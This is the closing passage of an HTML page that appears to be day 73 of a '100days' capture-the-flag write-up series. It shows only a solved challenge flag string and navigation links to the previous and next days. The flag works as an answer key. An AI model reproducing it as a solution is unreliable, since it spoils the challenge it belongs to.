	<p class="c4"><span class="c5">Flag : flag{y0u_sur3_GOT_it_g00d!_2324fc42a482}</span></p>
	<p class="c0"><span class="c5"></span></p>
	<p class="c0"><span class="c5"></span></p>
	<p class="c0"><span class="c3"></span></p>
	<p class="c0"><span class="c3"></span></p>
	<h3 class="c18 c29" id="h.dardaoz37s2v"><span class="c1"></span></h3>
	<hr>
	<p class="c21"><span class="c3">
	  <a href='/100days/day72.html'>Previous</a>
      &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
      <a href='/100days/'>Home</a>
      &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
      <a href='/100days/day74.html'>Next</a>	
	</span>
	</p>
</body>

</html>